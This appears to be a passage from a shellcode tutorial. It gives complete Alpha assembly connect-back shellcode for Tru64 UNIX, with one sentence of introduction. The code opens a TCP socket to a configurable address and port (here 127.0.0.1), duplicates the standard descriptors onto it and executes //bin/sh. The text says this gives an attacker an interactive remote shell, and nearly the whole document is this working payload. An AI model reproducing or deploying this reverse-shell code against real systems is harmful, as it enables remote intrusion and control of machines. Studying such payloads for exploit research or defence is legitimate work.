Let's take a look at some classic connect-back shellcode for Tru64. The following shellcode will connect to a user supplied remote machine on a given tcp port. It will duplicate the stdio descriptors and execute the shell interpreter, thus creating an interactive telnet-like session for the attacker.
#include <alpha/regdef.h> #include <alpha/pal.h> .text .arch generic .align 4 .globl main .ent main main: .frame $sp, 0, #148 bytes total size. #xorloop will give us the pc in a0 bic sp, 0xf, sp #make sure the stack is 16 byte aligned. addq a0, 0x70, s1 #address of sockaddr_in. s1 preserved addq a0, 0x88, s4 #address of //bin/sh stq s4, (sp) #store address of //bin/sh stq zero, 8(sp) mov 0x2, a0 #AF_INET mov 0x1, a1 #SOCK_STREAM bis zero, zero, a2 #0 addq zero, 0x61, v0 #socket syscall PAL_callsys mov v0, s0 #saved register, preserved. store socket number. mov s0, a0 #socket number mov s1, a1 #addr of sockaddr_in mov 0x10, a2 #sizeof sockaddr_in equals 16 addq zero, 0x62, v0 #connect syscall PAL_callsys mov 0x2, s2 duploop: mov s0, a0 #socket number. mov s2, a1 #stdin, stdout, stderr. addq zero, 0x5a, v0 #dup2 syscall. PAL_callsys subq s2, 0x1, s2 #decrement the counter. bge s2, duploop #loop for 2,1,0 (stderr, stdout, stdin). mov s4, a0 #address of //bin/sh mov sp, a1 #address of (address of //bin/sh) bis zero, zero, a2 #NULL addq zero, 0x3b, v0 #execve syscall PAL_callsys .long 0x901f0002 #port number .long 0x0100007f #ip addr .long 0x00000000 .long 0x00000000 .long 0x10 .long 0x00000000 .quad 0x68732f6e69622f2f .long 0x00000000 .end main